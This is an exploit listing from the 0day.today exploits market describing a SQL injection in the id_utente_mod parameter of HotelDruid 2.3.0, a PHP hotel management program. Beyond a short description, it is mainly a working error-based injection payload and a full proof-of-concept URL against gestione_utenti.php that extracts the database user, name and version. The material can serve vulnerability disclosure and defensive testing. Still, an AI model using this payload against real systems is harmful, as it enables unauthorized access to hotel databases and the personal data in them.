[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

HotelDruid 2.3.0 - id_utente_mod SQL Injection Vulnerability

Author
Sainadh Jamalpur
Risk
[
Security Risk High
]
0day-ID
0day-ID-31768
Category
web applications
Date add
12-12-2018
Platform
php
# Exploit Title: SQL Injection in HotelDruid version 2.3
# Google Dork: N/A
# Exploit Author: Sainadh Jamalpur
# Vendor Homepage: http://www.hoteldruid.com
# Software Link: https://sourceforge.net/projects/hoteldruid/
# Version: 2.3 (REQUIRED)
# Tested on: Windows x64/ Kali linux x64
# CVE : N/A

Description:
 Hoteldruid is an open source program for hotel management (property
management software) developed by DigitalDruid.Net
Vulnerability Description:
 the "id_utente_mod" parameter is Vulnerable to SQL Injection Vulnerability.
Payload:
1' AND EXTRACTVALUE(5,CONCAT(0x5c,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT
(ELT(5=5,1)))))--  -

Poc: http://hoteldruid/gestione_utenti.php?anno=2018&id_sessione=&modifica_gruppi=SI&id_utente_mod=1%27%20AND%20EXTRACTVALUE(5,CONCAT(0x5c,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT%20(ELT(5=5,1)))))--%20%20-

#  0day.today [2024-11-15]  #